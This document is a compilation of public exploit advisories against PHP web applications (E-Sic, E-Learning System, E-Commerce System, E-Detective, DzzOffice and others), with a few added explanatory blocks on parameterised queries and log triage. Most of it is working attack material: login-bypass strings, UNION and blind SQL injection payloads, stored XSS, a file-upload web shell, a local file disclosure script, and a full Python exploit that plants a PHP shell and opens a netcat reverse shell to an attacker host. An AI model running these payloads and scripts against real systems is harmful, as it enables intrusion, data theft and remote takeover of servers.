
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Jokes Portal Script Seo
# Script Version: v1.3
# Script Buy Now: http://www.e-soft24.com/jokes-portal-script-seo-p-370.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Browse to http://localhost/[PATH]/siteadmin/, enter any username, set the password to 'or''=' and submit.
# # # # # 
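The three login-bypass payloads on this page ('or''=' here, '=''or' in the E-Sic advisory further down, 'or 1 or' in the E-Learning System exploit) all work the same way: the credential value closes the string literal of a concatenated query and appends a tautology. The block below is an added example, not part of this advisory or of the affected product: it builds an in-memory SQLite table of my own construction and shows the concatenated query next to its parameterised replacement. The '=''or' variant relies on MySQL's loose string-to-number comparison and does not fire under SQLite, so the example exercises the other two.

```python
import sqlite3


def make_db():
    """Constructed sample admin table (not the product's schema)."""
    con = sqlite3.connect(':memory:')
    con.execute('CREATE TABLE admin (username TEXT, password TEXT)')
    con.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return con


def vulnerable_sql(username, password):
    """Query built by string concatenation, the pattern behind the bypass."""
    return ("SELECT username FROM admin WHERE username='%s' AND password='%s'"
            % (username, password))


def vulnerable_login(con, username, password):
    """Returns the matched username, or None. With 'or''=' as the password the
    WHERE clause becomes ... AND password='' OR ''='' which is true for every row."""
    row = con.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def safe_login(con, username, password):
    """Same check with bound parameters: the quote in the input stays data."""
    row = con.execute(
        "SELECT username FROM admin WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == '__main__':
    db = make_db()
    print(vulnerable_sql('anything', "'or''='"))
    print('concatenated :', vulnerable_login(db, 'anything', "'or''='"))
    print('parameterised:', safe_login(db, 'anything', "'or''='"))
```

The printed query makes the mechanism visible: the attacker never needs a valid username because the injected OR term is evaluated against every row.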
            
# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More information:
http://whiteboyz.xyz/esic-software-publico-xss.html

The XSS is in the requester (solicitante) registration area, where script
can be injected through the input that receives the user's name.

---------------------------------------------------------------------

Url: http://localhost/esic/index/

POST: http://localhost/cadastro/index.php
DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&uf=&numero=&complemento=&acao=Salvar

(CPFAQUI is a placeholder, "CPF here"; a valid CPF/CNPJ goes in that field.)

            
# Exploit Title: E-Sic Software livre CMS - Authentication Bypass
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More information:
http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html

The vulnerability is in the e-sic login area: submitting the username and
password values below is enough to enter the panel.
---------------------------------------------------------------------
PoC:
Url: http://vulnsite/esic/index/
User: '=''or'
Pass: '=''or'
POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar

            
# Exploit Title: E-Sic Software livre CMS - Blind SQL Injection
# Date: 12/10/2017
# Exploit Author: Guilherme Assmann
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398

The vulnerable script is a lookup in the restricted (restrito) area of e-sic, but it is reachable without authentication.
---------------------------------------------------------------------
Poc:
  Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1

  Parameter: q (GET)

  Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx

  sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs

            
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

Vulnerability is in the zip code search script
---------------------------------------------------------------------

Url: http://localhost/esiclivre/restrito/inc/buscacep.php


DATA:

Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr

    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),3344,3344,3344#

            
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

The vulnerability is in the password-reset form of the software
("Informe seu CPF ou CNPJ para enviarmos nova senha:", i.e. "Enter your CPF
or CNPJ so we can send you a new password:"): the cpfcnpj value reaches the
database query unfiltered, so SQL can be sent through it.
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL-- GJkR&btsub=Enviar

            
# Exploit Title: E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-11
# Vendor Homepage: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/
# Software Link: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/files/latest/download
# Version: 18.10
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/nilai/monitor_nilai.php?id_partai=[SQL]
 
%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%20%2c%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%61%64%6d%69%6e%29%57%48%45%52%45%28%40%78%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%30%78%32%30%2c%40%78%2c%30%78%35%35%37%33%36%35%37%32%32%30%34%39%34%34%33%61%2c%75%73%65%72%49%64%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%36%65%36%31%36%64%36%35%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%29%2d%2d

# URL-decoded:
# 1 UNION SELECT NULL,NULL,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x557365722049443a,userId,0x3c62723e,0x557365726e616d653a,username,0x3c62723e506173733a,password,0x3c62723e))))x))--
# (the hex literals are "User ID:", "<br>", "Username:" and "<br>Pass:"; the query concatenates every row of the admin table into one column)
            
# Exploit Title: E-Negosyo System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18801

# POC: 
# 1)
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
# 
GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 20:24:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/index.php?q=single-item&id=[SQL]
# ....
            
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution

#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST, the address the reverse shell should connect back to: Example: 10.9.192.23
#Step 4: Input your LPORT, the port the reverse shell will connect to: Example: 4444
#Step 5: Start a Netcat listener on the port specified in Step 4 with this command: nc -lnvp 4444
#Step 6: Hit enter once your Netcat listener is ready; the reverse shell arrives as soon as you do.

import requests

print('########################################################')
print('##                 E-LEARNING SYSTEM 1.0              ##')
print('##   AUTHENTICATION BYPASS & REMOTE CODE EXECUTION    ##')
print('########################################################')

print('Author - Himanshu Shukla & Saurav Shukla')

GREEN = '\033[32m'  # Green Text
RED = '\033[31m'    # Red Text
RESET = '\033[m'    # reset to the defaults

# Create a new session
s = requests.Session()

# Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

# Normalise the base URL so the paths below can be appended with a single slash
LINK = input("Enter URL of The Vulnerable Application : ").strip().rstrip('/') + '/'

# Authentication Bypass: user_email is concatenated into the login query,
# so 'or 1 or' turns its WHERE clause into a tautology
print("[*]Attempting Authentication Bypass...")
values = {"user_email": "'or 1 or'", "user_pass": "lol", "btnLogin": ""}
r = s.post(LINK + 'admin/login.php', data=values, cookies=cookies)
# the PoC submits the login twice and checks the second response
r = s.post(LINK + 'admin/login.php', data=values, cookies=cookies)

# Check if Authentication was bypassed or not.
if "You login as Administrator." in r.text:
    print(GREEN + "[+]Authentication Bypass Successful!" + RESET)
else:
    print(RED + "[-]Failed To Authenticate!" + RESET)

# Creating a PHP Web Shell (the lesson upload does not restrict the file type)
phpshell = {
    'file': (
        'shell.php',
        '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
        'application/x-php',
        {'Content-Disposition': 'form-data'},
    )
}

# Form fields the lesson module expects alongside the file
data = {'LessonChapter': 'test', 'LessonTitle': 'test', 'Category': 'Docs', 'save': ''}

# Uploading the web shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK + 'admin/modules/lesson/controller.php?action=add',
                cookies=cookies, files=phpshell, data=data, verify=False)

if "window.location='index.php'" in upload.text:
    print(GREEN + "[+]PHP Shell has been uploaded successfully!" + RESET)
else:
    print(RED + "[-]Failed To Upload The PHP Shell!" + RESET)

print("[*]Please Input Reverse Shell Details")
LHOST = input("[*]LHOST : ").strip()
LPORT = input("[*]LPORT : ").strip()

print('[*]Start Your Netcat Listener With This Command : nc -lvnp ' + LPORT)
input('[*]Hit Enter if your netcat listener is ready. ')
print('[+]Deploying The Web Shell...')

# Executing the web shell: uploaded lesson files are served from
# admin/modules/lesson/files/; the command is passed as the cmd parameter
s.get(LINK + 'admin/modules/lesson/files/shell.php',
      params={'cmd': 'nc %s %s -e /bin/bash' % (LHOST, LPORT)},
      cookies=cookies)
            
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux

Source code(search.php):
<?php
if(isset($_GET['search_submit'])){
    $search_key = $_GET['search'];
    // the raw GET value is interpolated straight into the LIKE pattern
    $search = "select * from posts where post_keywords like '%$search_key%'";
    $run_search = mysqli_query($con,$search);
    $count = mysqli_num_rows($run_search);
    if($count == 0){
        echo "<h2>No Result Found.Please Try With Another Keywords.</h2>";
    }else{
        while($search_row = mysqli_fetch_array($run_search)):
            $post_id = $search_row['post_id'];
            $post_title = $search_row['post_title'];
            $post_date = $search_row['post_date'];
            $post_author = $search_row['post_author'];
            $post_featured_image = $search_row['post_image'];
            $post_keywords = $search_row['post_keywords'];
            $post_content = substr($search_row['post_content'],0,200);
?>

Payload:
         http://127.0.0.1/e/search.php?search=a&search_submit=Search
         http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search
            
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: A stored Cross Site Scripting vulnerability in E-INSUARANCE v1.0
# allows an attacker to execute arbitrary web script via a crafted payload in
# the fname and lname parameters of the profile component.

# POC:
1. After login, go to http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. Put the payload below in the fname and lname fields:
"><script>alert("Hacked_by_Sandy")</script>
3. Click submit.

# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
            
Advisory:  E-Detective Lawful Interception System
    multiple security vulnerabilities
Date:    14/06/2015
CVE:    unassigned
Authors:  Mustafa Al-Bassam (https://musalbas.com)
    slipstream/RoL (https://twitter.com/TheWack0lian)
Software:  Decision Group E-Detective Lawful Interception System
Vendor URL:  http://www.edecision4u.com/

Software description:

"E-Detective is a real-time Internet interception, monitoring and
forensics system that captures, decodes, and reconstructs various types
of Internet traffic. It is commonly used for organization Internet
behavioural monitoring, auditing, record keeping, forensics analysis, and
investigation, as well as, legal and lawful interception for lawful
enforcement agencies such as Police Intelligence, Military Intelligence,
Cyber Security Departments, National Security Agencies, Criminal
Investigation Agencies, Counter Terrorism Agencies etc."

Vulnerabilities:

1) Unauthenticated Local File Disclosure

-----
Proof-of-concept:
https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py

# Proof-of-concept for unauthenticated LFD in E-Detective.
# Authors: Mustafa Al-Bassam (https://musalbas.com)
#          slipstream/RoL (https://twitter.com/TheWack0lian)

import argparse
import base64
import ssl
import urllib.request


def display_banner():
    print(r"""
                              _        
                             | |       
 _ ____      ___ __   ___  __| |______ 
| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
| |_) \ V  V /| | | |  __/ (_| |       
| .__/ \_/\_/ |_| |_|\___|\__,_|       
| |                                    
|_|                                    
     _      _            _   _           
    | |    | |          | | (_)          
  __| | ___| |_ ___  ___| |_ ___   _____ 
 / _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \
| (_| |  __/ ||  __/ (__| |_| |\ V /  __/
 \__,_|\___|\__\___|\___|\__|_| \_/ \___|
""")


argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.')
argparser.add_argument('hostname', help='hostname to pwn')
argparser.add_argument('file', help='path to file on server to grab')


def encode(text):
    # The "protection" on the file parameter: shift every character up by
    # 40 code points (rot40), then base64 the result.
    shifted = ''.join(chr(ord(c) + 40) for c in text)
    return base64.b64encode(shifted.encode('latin-1')).decode('ascii')


def poc(hostname, file):
    return http_read('https://' + hostname + '/common/download.php?file=' + encode(file))


def http_read(url):
    # The appliance is assumed to present a self-signed certificate, so
    # certificate verification is disabled for the request.
    ctx = ssl._create_unverified_context()
    return urllib.request.urlopen(url, context=ctx).read().decode('utf-8', 'replace')


if __name__ == "__main__":
    display_banner()
    args = argparser.parse_args()
    print(poc(args.hostname, args.file))


-----



The /common/download.php script in the web root lets an unauthenticated
user read any file on the system that the web server user can access.
This includes database credentials and any traffic intercepts captured
by the system.

The "file" parameter is "protected" by an inadequate "cipher": a shift of
every character by 40 code points (rot40) followed by base64, which is
trivially reversible.
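An added example, not code from the advisory or its PoC: the encoder above turned around, plus a helper that recovers the requested path from a captured download.php URL, which is what you want when triaging web-server logs for exploitation of this bug. The host name in the usage is hypothetical; the shift of 40 comes from the PoC, and paths are assumed to be ASCII so the shifted values still fit in one byte before base64.

```python
import base64
import urllib.parse

SHIFT = 40  # the "rot40" half of the scheme


def encode_file_param(path):
    """What the appliance's own links carry: shift every character up by
    SHIFT code points, then base64 the resulting bytes."""
    if any(ord(c) > 255 - SHIFT for c in path):
        raise ValueError('path must be ASCII-range for this encoding')
    shifted = ''.join(chr(ord(c) + SHIFT) for c in path)
    return base64.b64encode(shifted.encode('latin-1')).decode('ascii')


def decode_file_param(value):
    """Inverse of encode_file_param: base64-decode, then shift every byte down."""
    shifted = base64.b64decode(value).decode('latin-1')
    return ''.join(chr(ord(c) - SHIFT) for c in shifted)


def requested_path(url):
    """Given a logged download.php URL, return the file that was asked for
    (None when the URL has no file parameter)."""
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    return decode_file_param(params['file'][0]) if 'file' in params else None


def download_url(hostname, path):
    """Build the request the PoC sends, with the parameter URL-encoded."""
    return 'https://%s/common/download.php?file=%s' % (
        hostname, urllib.parse.quote(encode_file_param(path), safe=''))


if __name__ == '__main__':
    url = download_url('target.example', '/etc/passwd')   # hypothetical host
    print(url)
    print(requested_path(url))
```

Any download.php hit whose decoded path leaves the intended download directory (a leading "/" or a ".." component) is a retrieval attempt worth alerting on.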

2) Authenticated Remote Code Execution

The restore feature in the "config backup" page extracts a .tar file
encrypted with OpenSSL blowfish into the root directory (/) as root.

The .tar file should be encrypted with the static key "/tmp/.charlie".
Yes, that's the actual key - they pass the wrong argument to OpenSSL.
They used -k instead of -kfile, thus the key is the path of the key file
rather than the contents of the key file.

This enables an attacker to upload a shell into the web root, or
overwrite any system files such as /etc/shadow.
            
# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV)
# Date: 2020-05-14
# Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5
# Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection


###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload

Vulnerable URL: http://thiennv.com/ecommerce/index.php?q=profile
Exploitation:

POST /ecommerce/customer/controller.php?action=photos HTTP/1.1
Host: thiennv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828
Content-Length: 4723
Origin: http://thiennv.com
Connection: close
Referer: http://thiennv.com/ecommerce/index.php?q=profile
Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
Upgrade-Insecure-Requests: 1

-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="photo"; filename="logo1.php"
Content-Type: image/png

‰PNG


IHDR   á   á   m"H   &PLTEÝ=1ÿÿÿ
<?php phpinfo() ?>
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="savephoto"


-----------------------------270177040916945863071313890828--

###POC 2: Unauthenticated SQL Injection

Vulnerable URL:
http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854'
Exploitation:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload:
http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR
6075=6075#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT
(ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[11:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:22:17] [INFO] fetching database names
available databases [6]:
[*] db_ecommerce
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
---
Best Regards!
Mr. Ngo Van Thien
            
# # # # # 
# Exploit Title: E-commerce MLM Software 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/e-commerce-mlm/
# Demo: http://74.124.215.220/~advaemlm/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/service_detail.php?pid=[SQL]
# 
# -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+-
# 
# 
# 2)
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
# 
# -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+-
# 
# 
# 3)
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
# 
# -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+-
# 
# 
# # # # #
            
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04/23/2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
from selenium.webdriver.common.by import By
import os


# enter the link to the website you want to automate login.
website_link = "http://localhost/dzzoffice/user.php?mod=login"

# enter your login username
username = "admin@dzzoffice.com"

# enter your login password
password = "password"

# enter the element for username input field
element_for_username = "email"
# enter the element for password input field
element_for_password = "password"
# enter the element for submit button
element_for_submit = "loginsubmit"

# Launch the browser (Chrome; swap the driver for other browsers)
browser = webdriver.Chrome()

# Open the login page
browser.get(website_link)

# Run...
try:
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)

    ### Login
    signInButton = browser.find_element(By.NAME, element_for_submit)
    signInButton.click()

    ### Exploit
    laina = "http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
    browser.get(laina)

    ### Next level... :)  (the second script, saved as poc_login_1.py)
    os.system("python poc_login_1.py")

    print("payload is deployed_0...\n")
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")

### os.system

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
from selenium.webdriver.common.by import By
import time


# enter the link to the website you want to automate login.
website_link = "http://localhost/dzzoffice/admin.php?mod=setting"

# enter your login username
username = "admin@dzzoffice.com"

# enter your login password
password = "password"


# enter the element for username input field
element_for_username = "admin_email"

# enter the element for password input field
element_for_password = "admin_password"

# enter the element for submit button
element_for_submit = "submit"

# Launch the browser (Chrome; swap the driver for other browsers)
browser = webdriver.Chrome()

# Open the admin login page
browser.get(website_link)

# Run...
try:
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)

    ### Login
    signInButton = browser.find_element(By.NAME, element_for_submit)
    signInButton.click()

    ### Exploit
    time.sleep(3)
    element_for_natrutvanie = "settingsubmit"   # submit button of the settings form
    laina = "http://localhost/dzzoffice/admin.php?mod=setting"
    browser.get(laina)

    ### Inner text: write the payload into the four site-setting fields
    xss = '<script>alert("nu11secur1ty_is_here");</script>'
    for field in ("settingnew[metakeywords]", "settingnew[sitebeian]",
                  "settingnew[metadescription]", "settingnew[statcode]"):
        browser.execute_script(
            "document.querySelector('[name=\"%s\"]').value = %r" % (field, xss))

    time.sleep(5)

    # Submit exploit
    signInButton = browser.find_element(By.NAME, element_for_natrutvanie)
    signInButton.click()

    print("payload is deployed_1...\n")
except Exception:
    #### This exception occurs if the elements are not found in the webpage.
    print("Some error occurred :(")
            
[+] Credits: John Page AKA hyp3rlinx	
